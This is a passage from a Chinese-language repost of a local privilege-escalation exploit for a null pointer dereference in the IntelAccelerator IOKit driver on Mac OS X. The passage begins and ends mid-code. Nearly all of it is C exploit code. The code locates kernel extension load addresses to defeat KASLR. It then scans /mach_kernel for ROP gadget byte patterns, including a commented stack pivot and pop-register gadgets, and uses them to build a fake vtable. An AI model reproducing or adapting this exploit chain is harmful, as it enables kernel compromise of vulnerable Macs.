Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地(2)

for(CFIndex i = 0; i < count; i++){
    const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
    if (strcmp(name, target_name) == 0){
      CFNumberGetValue(CFDictionaryGetValue(values[i],
                        CFSTR("OSBundleLoadAddress")),
                        kCFNumberSInt64Type,
                        &addr);
      printf("%s: 0x%016llx\n", name, addr);
      break;
    }
  }
  return addr;

}

uint64_t load_addr(){
  uint64_t addr = 0;
  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
  CFIndex count = CFDictionaryGetCount(kd);
   
  void **keys;
  void **values;
   
  keys = (void **)malloc(sizeof(void *) * count);
  values = (void **)malloc(sizeof(void *) * count);
   
  CFDictionaryGetKeysAndValues(kd,
                                (const void **)keys,
                                (const void **)values);

for(CFIndex i = 0; i < count; i++){
    const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
    if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
      CFNumberGetValue(CFDictionaryGetValue(values[i],
                        CFSTR("OSBundleLoadAddress")),
                        kCFNumberSInt64Type,
                        &addr);
      printf("%s: 0x%016llx\n", name, addr);
      break;
    }
  }
  return addr;
 }

uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
  uint64_t kernel_base = 0xffffff8000200000;
  kernel_base += kaslr_slide;
     
  int fd = open("/mach_kernel", O_RDONLY);
  if (!fd)
    return NULL;

struct stat _stat;
  fstat(fd, &_stat);
  size_t buf_len = _stat.st_size;

uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);

if (!buf)
    return NULL;

/*
  this stack pivot to rax seems to be reliably present across mavericks versions:
    push rax
    add [rax], eax
    add [rbx+0x41], bl
    pop rsp
    pop r14
    pop r15
    pop rbp
    ret
  */
  uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
  uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
  uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
  printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
  uint64_t pivot = kernel_base + pivot_gadget_offset;

/*
    pop rdi
    ret
  */
  uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
  uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
  uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
  printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
  uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
   
  /*
    pop rsi
    ret
  */
  uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
  uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
  uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
  printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
  uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
   
  /*
    pop rdx
    ret
  */
  uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
  uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
  uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
  printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
  uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;

munmap(buf, buf_len);
  close(fd);

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ba407cad135a5b7ac9ebd9ad9fb8940f.html